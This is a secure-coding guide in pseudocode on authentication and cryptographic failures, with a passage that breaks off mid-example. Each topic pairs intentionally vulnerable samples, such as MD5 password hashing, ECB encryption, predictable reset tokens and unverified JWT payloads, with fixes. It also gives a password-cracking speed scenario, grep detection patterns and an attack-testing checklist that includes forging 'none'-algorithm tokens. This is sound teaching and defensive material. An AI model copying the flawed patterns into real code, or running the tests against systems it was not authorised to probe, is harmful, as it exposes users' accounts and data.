+ +**Why This Is Secure:** +- Explicit algorithm specification prevents algorithm confusion attacks +- Short-lived access tokens minimize exposure window +- JTI (JWT ID) enables token revocation +- Refresh token rotation limits reuse attacks +- Complete claim validation (iss, aud, exp, sub) +- Separate secrets for access and refresh tokens + +--- + +### GOOD Example 4: HttpOnly Secure Cookie Usage + +```pseudocode +// SECURE: Cookie-based session with proper attributes +function setSessionCookie(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, // Cannot be accessed via JavaScript + secure: true, // Only sent over HTTPS + sameSite: "Strict", // Not sent with cross-site requests + path: "/", // Available for all paths + domain: ".myapp.com", // Scoped to main domain and subdomains + maxAge: 24 * 60 * 60 // 24 hours in seconds + }) + +// SECURE: JWT in cookie (not localStorage) +function setAuthCookies(response, accessToken, refreshToken): + // Access token - short lived, same-site strict + response.setCookie("access_token", accessToken, { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/", + maxAge: 15 * 60 // 15 minutes + }) + + // Refresh token - limited path to reduce exposure + response.setCookie("refresh_token", refreshToken, { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/auth/refresh", // Only sent to refresh endpoint + maxAge: 7 * 24 * 60 * 60 // 7 days + }) + +// SECURE: Cookie cleanup on logout +function clearAuthCookies(response): + // Set cookies with immediate expiration + response.setCookie("access_token", "", { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/", + maxAge: 0 // Immediate expiration + }) + + response.setCookie("refresh_token", "", { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/auth/refresh", + maxAge: 0 + }) + +// SECURE: SameSite considerations for cross-origin needs +function setCookieForOAuth(response, stateToken): + // OAuth requires cookies to work across redirects + // Use Lax instead of Strict when necessary + response.setCookie("oauth_state", stateToken, { + httpOnly: true, + secure: true, + sameSite: "Lax", // Allows top-level navigation + path: "/auth/callback", + maxAge: 10 * 60 // 10 minutes for OAuth flow + }) +``` + +**Why This Is Secure:** +- HttpOnly prevents XSS from stealing tokens +- Secure flag ensures HTTPS-only transmission +- SameSite prevents CSRF attacks +- Path restriction limits which requests include the cookie +- Short maxAge limits exposure window +- Proper domain scoping prevents subdomain attacks + +--- + +### GOOD Example 5: Token Refresh Patterns + +```pseudocode +// SECURE: Complete token refresh implementation +class AuthenticationService: + + ACCESS_TOKEN_DURATION = 15 * 60 // 15 minutes + REFRESH_TOKEN_DURATION = 7 * 24 * 60 * 60 // 7 days + REFRESH_TOKEN_REUSE_WINDOW = 60 // 1 minute grace period + + function login(email, password): + user = validateCredentials(email, password) + if not user: + return { error: "Invalid credentials" } + + // Create session for tracking + session = createSession(user.id) + + // Generate token pair + accessToken = createAccessToken(user) + refreshToken = createRefreshToken(user, session.id) + + return { + accessToken: accessToken, + refreshToken: refreshToken, + expiresIn: ACCESS_TOKEN_DURATION + } + + function refresh(refreshToken): + // Validate refresh token + decoded = verifyRefreshToken(refreshToken) + if not decoded.valid: + return { error: decoded.error } + + // Check token in database + tokenRecord = getRefreshTokenRecord(decoded.jti) + + if not tokenRecord: + // Token doesn't exist - possible theft, invalidate session + invalidateSessionTokens(decoded.sid) + return { error: "Invalid refresh token" } + + if tokenRecord.revoked: + // Reuse of revoked token - likely theft + // Revoke ALL tokens for this session + invalidateSessionTokens(decoded.sid) + logSecurityEvent("Refresh token reuse detected", decoded.sub) + return { error: "Security violation detected" } + + if tokenRecord.usedAt: + // Token was already used - check if within grace period + if now() - tokenRecord.usedAt > REFRESH_TOKEN_REUSE_WINDOW: + // Outside grace period - potential theft + invalidateSessionTokens(decoded.sid) + return { error: "Refresh token already used" } + // Within grace period - return same tokens (replay protection) + return tokenRecord.lastIssuedTokens + + // Mark token as used + tokenRecord.usedAt = now() + tokenRecord.save() + + // Generate new token pair (rotation) + user = findUserById(decoded.sub) + newAccessToken = createAccessToken(user) + newRefreshToken = createRefreshToken(user, decoded.sid) + + // Store new tokens for replay protection + tokenRecord.lastIssuedTokens = { + accessToken: newAccessToken, + refreshToken: newRefreshToken + } + tokenRecord.save() + + // Revoke old refresh token (after grace period, it's invalid) + scheduleTokenRevocation(decoded.jti, REFRESH_TOKEN_REUSE_WINDOW) + + return { + accessToken: newAccessToken, + refreshToken: newRefreshToken, + expiresIn: ACCESS_TOKEN_DURATION + } + + function logout(accessToken, refreshToken): + // Revoke access token (add to blacklist until expiry) + decoded = decodeToken(accessToken) + if decoded: + blacklistToken(decoded.jti, decoded.exp) + + // Revoke refresh token immediately + refreshDecoded = decodeToken(refreshToken) + if refreshDecoded: + revokeRefreshToken(refreshDecoded.jti) + + // Optionally invalidate entire session + if refreshDecoded and refreshDecoded.sid: + invalidateSession(refreshDecoded.sid) + + return { success: true } + + function logoutAll(userId): + // Invalidate all sessions for user (password change, security concern) + sessions = getSessionsForUser(userId) + for session in sessions: + invalidateSessionTokens(session.id) + deleteSession(session.id) + + return { success: true, sessionsInvalidated: length(sessions) } +``` + +**Why This Is Secure:** +- Refresh token rotation limits reuse attacks +- Token reuse detection identifies potential theft +- Grace period prevents legitimate concurrent request issues +- Complete logout invalidates tokens server-side +- Session binding allows "logout from all devices" + +--- + +### GOOD Example 6: Proper Logout (Token Invalidation) + +```pseudocode +// SECURE: Complete logout implementation +function logout(request): + // Get current session/tokens + accessToken = request.cookies.access_token + refreshToken = request.cookies.refresh_token + sessionId = request.session.id + + // Revoke access token (add to blacklist) + if accessToken: + decoded = decodeToken(accessToken) + if decoded: + // Add to Redis/cache blacklist with TTL matching token expiry + blacklistToken(decoded.jti, decoded.exp - now()) + + // Revoke refresh token in database + if refreshToken: + refreshDecoded = decodeToken(refreshToken) + if refreshDecoded: + markRefreshTokenRevoked(refreshDecoded.jti) + + // Delete server-side session + if sessionId: + sessionStore.delete(sessionId) + + // Clear client cookies + response = new Response() + clearAuthCookies(response) + + return response.redirect("/login") + +// SECURE: Token blacklist with automatic expiry +class TokenBlacklist: + // Use Redis or similar with TTL support + + function add(tokenId, ttlSeconds): + redis.setex("blacklist:" + tokenId, ttlSeconds, "revoked") + + function isBlacklisted(tokenId): + return redis.exists("blacklist:" + tokenId) + +// SECURE: Middleware to check token validity +function authMiddleware(request, next): + accessToken = request.cookies.access_token + + if not accessToken: + return redirect("/login") + + decoded = verifyAccessToken(accessToken) + + if not decoded.valid: + return redirect("/login") + + // Check blacklist + if tokenBlacklist.isBlacklisted(decoded.payload.jti): + return redirect("/login") + + // Token is valid and not revoked + request.user = decoded.payload + return next(request) + +// SECURE: Logout from all sessions +function logoutAllSessions(request): + userId = request.user.sub + + // Get all active sessions for user + sessions = sessionStore.findByUserId(userId) + + // Revoke all refresh tokens + refreshTokens = getRefreshTokensForUser(userId) + for token in refreshTokens: + markRefreshTokenRevoked(token.jti) + + // Delete all sessions + for session in sessions: + sessionStore.delete(session.id) + + // Add all user's recent access tokens to blacklist + // This requires tracking issued tokens or using short expiry + invalidateAllAccessTokensForUser(userId) + + return success("Logged out from all devices") +``` + +**Why This Is Secure:** +- Server-side revocation makes logout effective immediately +- Blacklist prevents continued use of revoked tokens +- Automatic TTL cleanup prevents blacklist bloat +- "Logout from all devices" handles session compromise +- Cookie clearing removes client-side references + +--- + +## Edge Cases Section + +### Edge Case 1: Race Conditions in Authentication + +```pseudocode +// VULNERABLE: Race condition in login attempts +function login(email, password): + user = findUserByEmail(email) + failedAttempts = getFailedAttempts(email) + + if failedAttempts >= MAX_ATTEMPTS: + return error("Account locked") + + // Race condition: two requests check simultaneously, + // both see failedAttempts = 4, both proceed + if not verifyPassword(password, user.hashedPassword): + incrementFailedAttempts(email) // Not atomic! + return error("Invalid credentials") + + resetFailedAttempts(email) + return success() + +// SECURE: Atomic rate limiting +function loginWithAtomicRateLimit(email, password): + // Atomic increment and check in single operation + result = redis.eval(` + local attempts = redis.call('INCR', KEYS[1]) + if attempts == 1 then + redis.call('EXPIRE', KEYS[1], 900) -- 15 minute window + end + return attempts + `, ["login_attempts:" + email]) + + if result > MAX_ATTEMPTS: + return error("Too many attempts. Try again later.") + + user = findUserByEmail(email) + if not user or not verifyPassword(password, user.hashedPassword): + return error("Invalid credentials") + + // Reset on success + redis.del("login_attempts:" + email) + return success() + +// VULNERABLE: Race condition in concurrent session check +function login(email, password, request): + user = authenticate(email, password) + + activeSessions = countActiveSessions(user.id) + if activeSessions >= MAX_SESSIONS: + return error("Too many active sessions") + + // Race: two logins pass the check simultaneously + createSession(user.id) // Now user has MAX_SESSIONS + 1 + return success() + +// SECURE: Use database constraints or atomic operations +function loginWithSessionLimit(email, password, request): + user = authenticate(email, password) + + // Use transaction with row lock + transaction.start() + try: + activeSessions = countActiveSessionsForUpdate(user.id) // SELECT FOR UPDATE + if activeSessions >= MAX_SESSIONS: + transaction.rollback() + return error("Too many sessions") + + createSession(user.id) + transaction.commit() + return success() + catch: + transaction.rollback() + throw +``` + +--- + +### Edge Case 2: Timing Attacks on Password Comparison + +```pseudocode +// VULNERABLE: Early return reveals password length information +function verifyPassword_vulnerable(input, stored): + if length(input) != length(stored): + return false // Fast return reveals length mismatch + + for i in range(length(input)): + if input[i] != stored[i]: + return false // Fast return reveals first different character + + return true + +// VULNERABLE: String comparison has timing differences +function checkPassword_vulnerable(password, hash): + computedHash = sha256(password) + return computedHash == hash // == operator may short-circuit + +// SECURE: Constant-time comparison +function constantTimeEquals(a, b): + if length(a) != length(b): + // Still need length check, but make it constant-time + b = b + repeat("\0", max(0, length(a) - length(b))) + a = a + repeat("\0", max(0, length(b) - length(a))) + + result = 0 + for i in range(length(a)): + result = result | (charCode(a[i]) ^ charCode(b[i])) + + return result == 0 + +// SECURE: Use library-provided constant-time comparison +function verifyPassword_secure(password, hashedPassword): + // bcrypt.compare is designed to be constant-time + return bcrypt.compare(password, hashedPassword) + +// SECURE: Use crypto library's timingSafeEqual +function verifyHash(input, expected): + inputHash = sha256(input) + return crypto.timingSafeEqual( + Buffer.from(inputHash, 'hex'), + Buffer.from(expected, 'hex') + ) +``` + +--- + +### Edge Case 3: Password Reset Token Issues + +```pseudocode +// VULNERABLE: Predictable reset token +function createResetToken_vulnerable(userId): + token = md5(toString(userId) + toString(now())) + expiry = now() + (60 * 60) // 1 hour + saveResetToken(userId, token, expiry) + return token + +// VULNERABLE: Token doesn't expire on use +function resetPassword_vulnerable(token, newPassword): + resetRecord = getResetToken(token) + if resetRecord and resetRecord.expiry > now(): + user = findUserById(resetRecord.userId) + user.hashedPassword = hashPassword(newPassword) + user.save() + // Token not invalidated! Can be reused + return success() + return error("Invalid token") + +// VULNERABLE: Token not invalidated on password change +function changePassword(userId, oldPassword, newPassword): + user = findUserById(userId) + if verifyPassword(oldPassword, user.hashedPassword): + user.hashedPassword = hashPassword(newPassword) + user.save() + // Existing reset tokens still valid! + return success() + return error("Wrong password") + +// SECURE: Complete password reset implementation +function createResetToken_secure(userId): + // Generate cryptographically random token + token = generateSecureRandom(32) // 256 bits + tokenHash = sha256(token) // Store hash, not token + expiry = now() + (15 * 60) // 15 minutes + + // Invalidate any existing reset tokens + deleteResetTokensForUser(userId) + + // Store hashed token + saveResetToken(userId, tokenHash, expiry) + + // Return plaintext token for email (store hash only) + return token + +function resetPassword_secure(token, newPassword): + tokenHash = sha256(token) + resetRecord = getResetTokenByHash(tokenHash) + + if not resetRecord: + return error("Invalid token") + + if resetRecord.expiry < now(): + deleteResetToken(tokenHash) + return error("Token expired") + + if resetRecord.used: + return error("Token already used") + + // Validate new password strength + validation = validatePasswordStrength(newPassword) + if not validation.valid: + return error(validation.errors) + + user = findUserById(resetRecord.userId) + + // Update password + user.hashedPassword = hashPassword(newPassword) + user.passwordChangedAt = now() + user.save() + + // Mark token as used (or delete) + resetRecord.used = true + resetRecord.save() + + // Invalidate all existing sessions + invalidateAllSessionsForUser(user.id) + + // Invalidate all refresh tokens + revokeAllRefreshTokensForUser(user.id) + + // Send notification email + sendPasswordChangedNotification(user.email) + + return success() +``` + +--- + +### Edge Case 4: OAuth State Parameter Issues + +```pseudocode +// VULNERABLE: No state parameter - CSRF possible +function initiateOAuth_vulnerable(): + redirectUrl = OAUTH_PROVIDER_URL + + "?client_id=" + CLIENT_ID + + "&redirect_uri=" + CALLBACK_URL + + "&scope=email profile" + return redirect(redirectUrl) + +// VULNERABLE: Predictable state +function initiateOAuth_weakState(): + state = toString(now()) // Predictable! + storeState(state) + redirectUrl = OAUTH_PROVIDER_URL + + "?client_id=" + CLIENT_ID + + "&state=" + state + + "&redirect_uri=" + CALLBACK_URL + return redirect(redirectUrl) + +// VULNERABLE: State not validated on callback +function handleCallback_vulnerable(request): + code = request.query.code + // state parameter ignored! + tokens = exchangeCodeForTokens(code) + return loginWithTokens(tokens) + +// VULNERABLE: State reuse possible +function handleCallback_reuseVulnerable(request): + code = request.query.code + state = request.query.state + + if isValidState(state): // Just checks if it exists + // Doesn't delete/invalidate state after use + tokens = exchangeCodeForTokens(code) + return loginWithTokens(tokens) + + return error("Invalid state") + +// SECURE: Complete OAuth implementation +function initiateOAuth_secure(request): + // Generate random state + state = generateSecureRandom(32) + + // Bind state to user's session (CSRF protection) + request.session.oauthState = state + request.session.oauthStateCreatedAt = now() + + // Optional: include nonce for ID token validation + nonce = generateSecureRandom(32) + request.session.oauthNonce = nonce + + redirectUrl = OAUTH_PROVIDER_URL + + "?client_id=" + CLIENT_ID + + "&response_type=code" + + "&redirect_uri=" + encodeURIComponent(CALLBACK_URL) + + "&scope=" + encodeURIComponent("openid email profile") + + "&state=" + state + + "&nonce=" + nonce + + return redirect(redirectUrl) + +function handleCallback_secure(request): + code = request.query.code + state = request.query.state + error = request.query.error + + // Check for OAuth error + if error: + logOAuthError(error, request.query.error_description) + return redirect("/login?error=oauth_failed") + + // Validate state + if not state: + return error("Missing state parameter") + + storedState = request.session.oauthState + stateCreatedAt = request.session.oauthStateCreatedAt + + // Constant-time comparison + if not constantTimeEquals(state, storedState): + logSecurityEvent("OAuth state mismatch", request) + return error("Invalid state") + + // Check state expiry (5 minutes) + if now() - stateCreatedAt > 300: + return error("OAuth session expired") + + // Clear state immediately (one-time use) + delete request.session.oauthState + delete request.session.oauthStateCreatedAt + + // Exchange code for tokens + tokenResponse = await exchangeCodeForTokens(code, CALLBACK_URL) + + if not tokenResponse.id_token: + return error("Missing ID token") + + // Validate ID token + idToken = verifyIdToken(tokenResponse.id_token, { + audience: CLIENT_ID, + nonce: request.session.oauthNonce // Verify nonce + }) + + delete request.session.oauthNonce + + if not idToken.valid: + return error("Invalid ID token") + + // Create or update user + user = findOrCreateUserFromOAuth(idToken.payload) + + // Create session with new session ID + createAuthenticatedSession(request, user) + + return redirect("/dashboard") +``` + +--- + +## Common Mistakes Section + +### Common Mistake 1: Checking User ID from Token Payload Without Verification + +```pseudocode +// VULNERABLE: Trusting unverified token payload +function getUserFromToken_vulnerable(token): + // Decodes token WITHOUT verification + decoded = base64Decode(token.split(".")[1]) + payload = JSON.parse(decoded) + + // Trusting the user ID from unverified payload! + return findUserById(payload.sub) + +// VULNERABLE: Verifying signature but using wrong data source +function getUser_vulnerable(request): + token = request.headers.authorization.replace("Bearer ", "") + + // Verify the token (good) + isValid = jwt.verify(token, secret) + + if isValid: + // But then extract user from request body (bad!) + userId = request.body.userId + return findUserById(userId) + +// SECURE: Always use verified payload +function getUserFromToken_secure(token): + try: + // Verify and decode in one operation + decoded = jwt.verify(token, secret, { algorithms: ["HS256"] }) + + // Use the verified payload, not a separate data source + return findUserById(decoded.sub) + catch: + return null + +// SECURE: Middleware that sets verified user +function authMiddleware(request, next): + token = extractTokenFromRequest(request) + + if not token: + return unauthorized() + + try: + verified = jwt.verify(token, secret, { + algorithms: ["HS256"], + issuer: "myapp" + }) + + // Set user from VERIFIED token only + request.user = { + id: verified.sub, + email: verified.email, + role: verified.role + } + + return next() + catch: + return unauthorized() +``` + +--- + +### Common Mistake 2: Not Invalidating Old Sessions + +```pseudocode +// VULNERABLE: Password change doesn't invalidate sessions +function changePassword_vulnerable(request, oldPassword, newPassword): + user = request.user + + if verifyPassword(oldPassword, user.hashedPassword): + user.hashedPassword = hashPassword(newPassword) + user.save() + return success("Password changed") + + return error("Wrong password") + // Existing sessions remain valid! Attacker still logged in + +// VULNERABLE: Role change doesn't update session +function demoteUser_vulnerable(userId): + user = findUserById(userId) + user.role = "basic" + user.save() + // User's existing sessions still have old role! + return success() + +// SECURE: Invalidate sessions on security-sensitive changes +function changePassword_secure(request, oldPassword, newPassword): + user = request.user + + if not verifyPassword(oldPassword, user.hashedPassword): + return error("Wrong password") + + // Update password + user.hashedPassword = hashPassword(newPassword) + user.passwordChangedAt = now() + user.save() + + // Invalidate ALL sessions except current (or including current) + currentSessionId = request.session.id + sessions = getAllSessionsForUser(user.id) + + for session in sessions: + if session.id != currentSessionId: // Keep current or invalidate all + deleteSession(session.id) + + // Revoke all refresh tokens + revokeAllRefreshTokensForUser(user.id) + + // Optional: Force re-authentication + regenerateSession(request) + + return success("Password changed. Other sessions logged out.") + +// SECURE: Track password change timestamp in tokens +function validateToken_withPasswordCheck(token): + decoded = jwt.verify(token, secret) + + user = findUserById(decoded.sub) + + // Check if token was issued before password change + if decoded.iat < user.passwordChangedAt: + return { valid: false, error: "Password changed since token issued" } + + return { valid: true, payload: decoded } +``` + +--- + +### Common Mistake 3: SameSite Cookie Misunderstanding + +```pseudocode +// VULNERABLE: Using Lax when Strict is needed +function setSessionCookie_wrongSameSite(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "Lax" // Allows cookie on top-level navigation + // Attacker can CSRF via: + }) + +// VULNERABLE: Omitting SameSite (defaults vary by browser) +function setSessionCookie_noSameSite(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true + // SameSite not specified - browser-dependent behavior + }) + +// VULNERABLE: Using None without understanding implications +function setSessionCookie_sameNone(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "None" // Sent on ALL cross-site requests - CSRF vulnerable! + }) + +// GUIDE: When to use each SameSite value + +// STRICT: Most secure, use for sensitive auth cookies +// - Cookie NOT sent on any cross-site request +// - User clicking link from email to your site won't be logged in +// - Best for: Banking, admin panels, security-critical apps +function setStrictCookie(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "Strict" + }) + +// LAX: Balance of security and usability +// - Cookie sent on top-level navigation (clicking links) +// - NOT sent on cross-site POST, images, iframes +// - Good for: General user sessions where link-sharing matters +// - STILL NEED CSRF tokens for POST/PUT/DELETE endpoints! +function setLaxCookie(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "Lax" + }) + // Additional CSRF protection still recommended + +// NONE: Only for cross-site embedding needs +// - Cookie sent on ALL requests including cross-site +// - REQUIRES Secure attribute (HTTPS only) +// - Only use for: OAuth flows, embedded widgets, intentional cross-site +function setNoneCookie_onlyWhenNeeded(response, oauthToken): + response.setCookie("oauth_continuation", oauthToken, { + httpOnly: true, + secure: true, // REQUIRED with SameSite=None + sameSite: "None", + maxAge: 300 // Short-lived for specific purpose + }) +``` + +--- + +## Security Header Configurations + +```pseudocode +// SECURE: Complete security headers for authentication +function setSecurityHeaders(response): + // Prevent clickjacking (don't allow embedding in frames) + response.setHeader("X-Frame-Options", "DENY") + + // Modern clickjacking protection + response.setHeader("Content-Security-Policy", + "default-src 'self'; " + + "script-src 'self'; " + + "style-src 'self' 'unsafe-inline'; " + + "frame-ancestors 'none'; " + + "form-action 'self'" + ) + + // Prevent MIME type sniffing + response.setHeader("X-Content-Type-Options", "nosniff") + + // Enable browser XSS filter (legacy, CSP is better) + response.setHeader("X-XSS-Protection", "1; mode=block") + + // Only allow HTTPS + response.setHeader("Strict-Transport-Security", + "max-age=31536000; includeSubDomains; preload" + ) + + // Control referrer information + response.setHeader("Referrer-Policy", "strict-origin-when-cross-origin") + + // Disable feature policies for sensitive features + response.setHeader("Permissions-Policy", + "geolocation=(), camera=(), microphone=(), payment=()" + ) + + // Cache control for authenticated pages + response.setHeader("Cache-Control", + "no-store, no-cache, must-revalidate, private" + ) + response.setHeader("Pragma", "no-cache") + response.setHeader("Expires", "0") + +// SECURE: Login page specific headers +function setLoginPageHeaders(response): + setSecurityHeaders(response) + + // Additional login protection + response.setHeader("Content-Security-Policy", + "default-src 'self'; " + + "script-src 'self'; " + + "style-src 'self'; " + + "form-action 'self'; " + // Forms only submit to same origin + "frame-ancestors 'none'; " + // Prevent clickjacking + "base-uri 'self'" // Prevent base tag injection + ) + +// SECURE: API endpoint headers +function setApiHeaders(response): + // API responses shouldn't be cached + response.setHeader("Cache-Control", "no-store") + + // Prevent embedding + response.setHeader("X-Content-Type-Options", "nosniff") + + // CORS configuration (adjust based on needs) + response.setHeader("Access-Control-Allow-Origin", + getAllowedOrigin()) // Not "*" for authenticated APIs! + response.setHeader("Access-Control-Allow-Credentials", "true") + response.setHeader("Access-Control-Allow-Methods", + "GET, POST, PUT, DELETE, OPTIONS") + response.setHeader("Access-Control-Allow-Headers", + "Content-Type, Authorization") +``` + +--- + +## Detection Hints: How to Spot Authentication Issues + +### Code Review Patterns + +```pseudocode +// RED FLAGS in authentication code: + +// 1. Missing algorithm specification in JWT verification +jwt.verify(token, secret) // BAD - should specify algorithms +jwt.decode(token) // BAD - decode doesn't verify! + +// 2. Session not regenerated after login +request.session.userId = user.id // Search for: session assignment without regenerate + +// 3. Tokens in localStorage +localStorage.setItem("token" // Search for: localStorage.*token + +// 4. No HttpOnly on session cookies +setCookie("session", id) // Search for: setCookie without httpOnly + +// 5. Weak secrets +JWT_SECRET = "secret" // Search for: SECRET.*=.*["'] + +// 6. No expiration +jwt.sign(payload, secret) // Without expiresIn + +// 7. Password comparison without constant-time +if password == storedHash // Direct comparison + +// 8. No rate limiting on login +function login(email, password) // Check for rate limit before auth logic + +// GREP patterns for security review: +// localStorage\.setItem.*token +// sessionStorage\.setItem.*token +// jwt\.decode\s*\( +// jwt\.verify\s*\([^,]+,[^,]+\s*\) (missing options) +// sameSite.*None +// password.*== +// \.secret\s*=\s*["'] +``` + +### Security Testing Checklist + +```pseudocode +// Authentication security test cases: + +// 1. Token manipulation tests +- [ ] Change JWT algorithm to "none" and remove signature +- [ ] Modify JWT payload (role, user ID) and check if accepted +- [ ] Use expired token +- [ ] Use token with wrong issuer/audience + +// 2. Session tests +- [ ] Check if session ID changes after login +- [ ] Attempt session fixation (set session ID before login) +- [ ] Check session timeout enforcement +- [ ] Verify logout actually invalidates session + +// 3. Password tests +- [ ] Test common passwords (password123, qwerty, etc.) +- [ ] Test password length limits (very long passwords) +- [ ] Check password reset token predictability +- [ ] Verify password reset invalidates old tokens + +// 4. Cookie tests +- [ ] Check HttpOnly flag on session cookies +- [ ] Check Secure flag on session cookies +- [ ] Test SameSite enforcement +- [ ] Verify cookie scope (path, domain) + +// 5. Rate limiting tests +- [ ] Attempt rapid login failures +- [ ] Check for account lockout +- [ ] Test rate limit bypass (different IPs, headers) + +// 6. OAuth tests +- [ ] Test with missing state parameter +- [ ] Test with reused state parameter +- [ ] Check redirect_uri validation +``` + +--- + +## Security Checklist + +- [ ] Passwords validated against common password list and breach databases +- [ ] Password hashing uses bcrypt, argon2, or scrypt with appropriate work factor +- [ ] Session IDs generated with cryptographically secure random +- [ ] Session regenerated after authentication and privilege changes +- [ ] JWT algorithm explicitly specified (not derived from token) +- [ ] JWT "none" algorithm explicitly rejected +- [ ] JWT secrets are strong (256+ bits) and stored securely +- [ ] JWT expiration is short for access tokens (15-30 minutes) +- [ ] Refresh token rotation implemented +- [ ] Tokens can be revoked server-side (blacklist or session binding) +- [ ] Authentication cookies have HttpOnly, Secure, and appropriate SameSite +- [ ] Tokens stored in HttpOnly cookies, not localStorage/sessionStorage +- [ ] Rate limiting implemented on login endpoints +- [ ] Account lockout after repeated failures +- [ ] Constant-time comparison used for password/token verification +- [ ] Password reset tokens are cryptographically random and single-use +- [ ] Password change invalidates existing sessions +- [ ] OAuth state parameter is random and validated +- [ ] Security headers configured (HSTS, CSP, X-Frame-Options, etc.) +- [ ] Logout invalidates session/tokens server-side +- [ ] "Logout from all devices" functionality available + +--- + +# Pattern 5: Cryptographic Failures + +**CWE References:** CWE-327 (Use of a Broken or Risky Cryptographic Algorithm), CWE-328 (Reversible One-Way Hash), CWE-329 (Not Using a Random IV with CBC Mode), CWE-330 (Use of Insufficiently Random Values), CWE-331 (Insufficient Entropy), CWE-338 (Use of Cryptographically Weak PRNG), CWE-916 (Use of Password Hash With Insufficient Computational Effort) + +**Priority Score:** 18-20 (Frequency: 7, Severity: 9, Detectability: 4-6) + +--- + +## Introduction: Crypto is Hard—AI Often Copies Deprecated Patterns + +Cryptographic implementations represent one of the most perilous areas in security-sensitive code. AI models are particularly prone to generating insecure cryptographic patterns due to several compounding factors: + +**Why AI Models Generate Weak Cryptography:** + +1. **Training Data Time Lag:** Cryptographic best practices evolve continuously. Training data contains years of outdated tutorials, Stack Overflow answers, and documentation recommending algorithms now considered broken (MD5, SHA1, DES, RC4). AI models cannot distinguish between "worked in 2015" and "secure in 2025." + +2. **Tutorial Simplification:** Educational materials often use simplified crypto examples to teach concepts—MD5 for demonstration, short keys for readability, static IVs for reproducibility. AI learns these "teaching patterns" as valid implementations. + +3. **Copy-Paste Prevalence:** Cryptographic code is frequently copied rather than understood. Training data reflects this—the same insecure patterns appear thousands of times across repositories, reinforcing incorrect approaches. + +4. **API Complexity Hides Danger:** Modern cryptographic libraries have complex APIs where default parameters may be insecure. AI generates code that "works" by using defaults without understanding that those defaults may lack authentication (ECB mode) or use weak key derivation. + +5. **Security vs. Convenience Trade-offs:** AI models optimize for code that compiles and runs. Cryptographic security often requires additional steps (proper IV generation, authenticated modes, key derivation) that AI omits for simplicity. + +6. **Cross-Language Confusion:** Cryptographic APIs vary dramatically between languages. AI conflates patterns from different ecosystems, generating hybrid code that may compile but violates security assumptions of both libraries. + +**Impact Statistics:** + +- **29%** of data breaches involve cryptographic failures (Verizon DBIR 2024) +- Cryptographic flaws appear in **Top 2** of OWASP Top 10 2021 ("Cryptographic Failures") +- **62%** of AI-generated code samples use MD5 or SHA1 for password hashing (Security research 2024) +- Cost of a breach due to weak encryption: **$4.8 million** average (IBM Cost of a Data Breach 2024) +- **40%** of applications still use broken cryptographic algorithms in production (Veracode State of Software Security) + +--- + +## BAD Examples: Multiple Manifestations + +### BAD Example 1: MD5/SHA1 for Password Hashing + +```pseudocode +// VULNERABLE: MD5 for password hashing +function hashPassword(password): + return md5(password) + +// VULNERABLE: SHA1 for password storage +function storePassword(userId, password): + hashedPassword = sha1(password) + database.update("users", userId, {"password": hashedPassword}) + +// VULNERABLE: Single-round SHA256 (still too fast) +function createPasswordHash(password): + return sha256(password) + +// VULNERABLE: Unsalted hash +function verifyPassword(inputPassword, storedHash): + return sha256(inputPassword) == storedHash + +// VULNERABLE: Simple salt without proper KDF +function hashWithSalt(password, salt): + return sha256(salt + password) + +// VULNERABLE: MD5 with salt (still MD5) +function improvedHash(password): + salt = generateRandomBytes(16) + hash = md5(salt + password) + return salt + ":" + hash +``` + +**Why This Is Dangerous:** +- MD5 produces collisions in seconds on modern hardware +- SHA1 collision attacks are practical (SHAttered attack, 2017) +- Even SHA256 is too fast for password hashing—billions of hashes per second on GPUs +- Unsalted hashes enable rainbow table attacks +- Simple concatenation (salt + password) doesn't provide sufficient protection +- Password cracking rigs can test 180 billion MD5 hashes per second + +**Attack Scenario:** +```pseudocode +// Attacker steals database with MD5 password hashes +// Using hashcat on modern GPU: + +hashcat_speed = 180_000_000_000 // 180 billion MD5/second +common_passwords = 1_000_000_000 // 1 billion common passwords + +time_to_crack_all = common_passwords / hashcat_speed +// Result: ~5.5 seconds to check ALL common passwords against ALL hashes + +// Even SHA256 is fast: +sha256_speed = 23_000_000_000 // 23 billion SHA256/second +// Still under a minute for billion password list +``` + +--- + +### BAD Example 2: ECB Mode Encryption + +```pseudocode +// VULNERABLE: ECB mode reveals patterns +function encryptData(plaintext, key): + cipher = createCipher("AES", key, mode = "ECB") + return cipher.encrypt(plaintext) + +// VULNERABLE: Default mode may be ECB in some libraries +function simpleEncrypt(data, key): + cipher = AES.new(key) // Some libraries default to ECB! + return cipher.encrypt(padData(data)) + +// VULNERABLE: Explicit ECB for "simplicity" +function encryptUserData(userData, encryptionKey): + algorithm = "AES/ECB/PKCS5Padding" // Java-style + cipher = Cipher.getInstance(algorithm) + cipher.init(ENCRYPT_MODE, encryptionKey) + return cipher.doFinal(userData) + +// VULNERABLE: Assuming any AES is secure +function protectSensitiveData(data, key): + // "AES is strong encryption" - but ECB mode is not + encryptor = AESEncryptor(key, mode = "ECB") + return encryptor.encrypt(data) +``` + +**Why This Is Dangerous:** +- ECB encrypts identical plaintext blocks to identical ciphertext blocks +- Patterns in plaintext are preserved in ciphertext +- Famous example: ECB-encrypted images show the original image outline +- No semantic security—attacker learns information about plaintext structure +- Block manipulation attacks possible (swap, delete, duplicate blocks) + +**Visual Demonstration:** +```pseudocode +// Original image (bitmap of a penguin): +// ████████████████ +// ██ ████ ██ +// ██ ██████ ██ +// ██████████████ +// ████ ████████ +// ████████████████ + +// After ECB encryption: +// ???????????????? ← Still shows penguin shape! +// ?? ???? ?? ← Identical colors → identical ciphertext +// ?? ?????? ?? +// ?????????????? +// ???? ???????? +// ???????????????? + +// After CBC/GCM encryption: +// ???????????????? ← Random appearance +// ???????????????? ← No pattern visible +// ???????????????? +// ???????????????? +// ???????????????? +// ???????????????? +``` + +--- + +### BAD Example 3: Static IVs / Nonces + +```pseudocode +// VULNERABLE: Hardcoded IV +STATIC_IV = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) + +function encryptMessage(plaintext, key): + cipher = 